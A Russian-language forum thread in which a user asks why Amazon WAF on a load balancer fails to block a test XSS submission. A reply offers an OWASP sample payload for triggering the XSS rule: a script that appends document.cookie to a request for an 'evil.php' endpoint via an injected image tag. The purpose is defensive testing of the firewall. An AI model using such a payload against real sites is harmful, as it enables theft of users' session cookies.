Amazon WAF не блокирует XSS или SQL-инъекции
Я попытался отправить форму с помощью <script>danger</script> и меня НЕ заблокировали. Я поставил WAF на свой ELB и провел тестирование, чтобы убедиться, что у меня есть аналитика (ниже).
Что я делаю не так?
Вот мой ACL:
Вот мое правило XSS и SQL:
Аналитика: (Чтобы показать, что трафик действительно маршрутизируется через LB) 
Ниже приведен один пример того, как активировать правило XSS. Это должно запускать ваше правило само по себе (вы можете доказать это, указав на свою собственную страницу PHP или другое веб-расположение), но это, по крайней мере, демонстрирует общий принцип.
<script type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
document.write("<img src='" + adr + "' />");
</script>
Этот и другие примеры доступны в следующей статье OWASP: